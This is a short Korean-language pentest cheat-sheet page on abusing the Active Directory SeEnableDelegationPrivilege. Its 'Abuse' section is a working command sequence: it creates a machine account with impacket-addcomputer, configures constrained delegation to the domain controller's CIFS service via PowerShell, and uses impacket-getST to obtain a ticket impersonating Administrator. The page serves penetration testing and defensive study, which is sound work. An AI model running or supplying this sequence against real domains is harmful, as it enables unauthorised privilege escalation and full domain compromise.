SeEnableDelegationPrivilege
SeEnableDelegationPrivilege는 Constrained Delegation을 위임할 수 있는 권한입니다. 이 권한이 있으면 spn을 소유한 계정에서 특정 서비스에 한정해 다른 사용자를 가장한 티켓 발급이 가능합니다.
위임 구성을 하기 위해 컴퓨터 계정에 높은 권한( GenericAll, GenericWrite 등)이 필요합니다.
Abuse
# 새 컴퓨터 계정 생성
impacket-addcomputer -computer-name 'delegation$' -computer-pass 'Password123!' -dc-host 192.168.1.11 -domain-netbios contoso.com contoso.com/user-A:'Password123!'
# 위임 구성에 사용할 서비스 등록
Set-ADComputer -Identity delegation$ -Add @{'msDS-AllowedToDelegateTo'=@('cifs/ad01.contoso.com')}
# delegation$ 계정에게 클라이언트 가장 권한 할당
Set-ADAccountControl -Identity "delegation$" -TrustedToAuthForDelegation $True
# 할당된 권한 확인
Get-ADComputer -Filter * -Properties msDS-AllowedToDelegateTo | Where-Object { $_.'msDS-AllowedToDelegateTo' -ne $null } | Select-Object Name, msDS-AllowedToDelegateTo
# 위임 악용
impacket-getST -spn 'cifs/ad01.contoso.com' -impersonate Administrator contoso.com/delegation$:'Password123!'References
Last updated
Was this helpful?